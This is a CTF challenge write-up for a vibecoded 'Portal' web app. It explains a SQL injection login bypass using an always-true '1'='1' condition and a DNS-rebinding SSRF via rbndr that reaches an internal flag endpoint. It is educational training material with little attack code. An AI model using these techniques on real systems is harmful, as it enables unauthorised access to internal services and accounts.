Portal

My company vibecoded a portal for viewing websites, wonder what can go wrong

Overview

This challenge was created with the AYCEP training materials in mind and I will be going through the challenge with reference to different section of the training materials.

Initial Analysis

We can first start with analyzing docker-compose.yml, which gives us a high-level overview of the challenge's network.

services:
  mysql:
    image: mariadb:10.11
    env_file: .env
    healthcheck:
      test: ["CMD-SHELL", "mariadb -u$${MYSQL_USER} -p$${MYSQL_PASSWORD} -e 'SELECT 1' || exit 1"]
      interval: 30s
      timeout: 5s
      retries: 10
      start_period: 30s
    networks:
      - backend

  app:
    build: .
    env_file: .env
    ports:
      - "3000:3000"
    dns:
      - 8.8.8.8
    depends_on:
      mysql:
        condition: service_healthy
    networks:
      - backend

networks:
  backend:
    driver: bridge

From this, we can notice two services, a front-facing app container and a mysql database. Notably, the mysql service does not expose any ports externally and is only reachable from the internal docker network. We can take a further look at Dockerfile to gain more insight into how the application is intialized.

The final command is particularly interesting: instead of launching a single application, the container starts supervisord, suggesting that multiple processes are managed within the same container.

Looking into supervisord.conf confirms this suspicion. Two separate programs, public and internal are defined and automatically started when the container comes up.

With that, we have identified the three main components of this challenge and can proceed to analyze the source-code.

Source Code Analysis

Like every CTF challenge ever, we want to find where the flag is before analyzing any source-code to give a goal to head towards to. With a quick browse, we see that its located in /internal/flag.txt and that /internal/app.py displays it.

Directory Structure

Taking a closer look at /internal/app.py, we note that the internal app has a /flag endpoint that displays our flag and the app is running locally on port 5000.

Knowing that only public is reachable by us, we focus our attention on /public/*.

We start by identifying sources and sinks. Starting with /public/app.py, we identify the following sources.

  • /login

    • request.form['username']

    • request.form['password']

  • /register

    • request.form['username']

    • request.form['password']

  • /dashboard

    • request.form.get('target_url', '')

      • Requires session.get('role') == 'admin'

Now that we have identified all the sources, it's time to identify whether these sources go through any form of transformation/validation.

For /login and /register, it passes user-supplied input to database helper functions, verify_user and add_user respectively located in db.py

Reviewing the said functions, we observe a difference in how user-input is handled. The add_user function uses SQLAlchemyโ€™s ORM to create a User object and insert it into the database.

SQLAlchemy's ORM automatically parameterizes queries which is one of the fixes covered that mitigates SQLi.

However, verify_user takes a different approach.

Here, user-controlled input is directly concatenated into a SQL query using string formatting. This makes it vulnerable to SQLi!

This gives us a vulnerable sink from /login to verify_user.

Let's continue exploring /dashboard app route for now.

Ignoring the admin role check for the time being, we see that it first validates our target_url with validate_host before passing it to fetch_url before displaying the response.

Taking a look at /public/utils.py, we can see the implementation of validate_host and fetch_url in-depth.

From a glance we see that it does the following checks

  1. Checks URL scheme to ensure it is http or https

  2. Performs a DNS lookup with socket.gethostbyname

  3. Enforces a IP blacklist

    1. Loopback - 127.0.0.1

    2. Private IPs - (10.x, 192.168.x.x etc)

    3. Reserved Ranges

    4. Link-Local

  4. Returns parsed which is subsequently fetched with requests.get

This seems to prevent SSRF as after all, we are not able to bypass the DNS lookup to localhost right?

This brings us to DNS-Rebinding, a variation of SSRF.

DNS-Rebinding Diagram

Essentially, the main point here is that requests.get performs its own independent DNS Resolutionarrow-up-right.

An attacker can exploit this gap by serving a public IP to pass the initial DNS lookup socket.gethostbyname(host), then rapidly swapping to an internal IP for the request.

You can read about the vulnerability in detail over herearrow-up-right

This gives us our last vulnerable sink from /dashboard to fetch_url.

Now, let's combine the pieces for exploitation.

Exploitation

Based on the Dockerfile earlier, we know that it executes init.py which we now see creates the required tables and adds a admin user into the database.

We can thus craft a SQLi query with the goal of logging in as admin

Since the expression '1'='1' always evaluates to TRUE, the WHERE clause becomes TRUE, allowing row to return a valid result.

The username has to be admin as get_user_by_username uses it to retrieve user information later in the function.

This brings us to /dashboard.

Success!

Now that we are admin, we can use the URL scanner functionality which we previously identified is vulnerable to a DNS-Rebinding attack.

We can use the tool rbndrarrow-up-right which generates a hostname which switches between two IP addresses randomly.

rbndr

We also have to add the port 5000 and /flag as we want to reach the internal app's flag endpoint.

Eventually, the DNS resolution swapped at the exact moment necessary to bypass the check, allowing us to capture the flag.

Success!

I also automated it with a solve script to make things easier.

Reflection

With this being AYCEP Finals, I wanted to provide participants a challenge with a variation of an attack that was not covered during training.

This writeup serves as a more structured process of approaching web ctf challenges. As codebases get larger, having the right approach will save you lots of time especially if augmented with LLMs.

Thanks for reading!

Last updated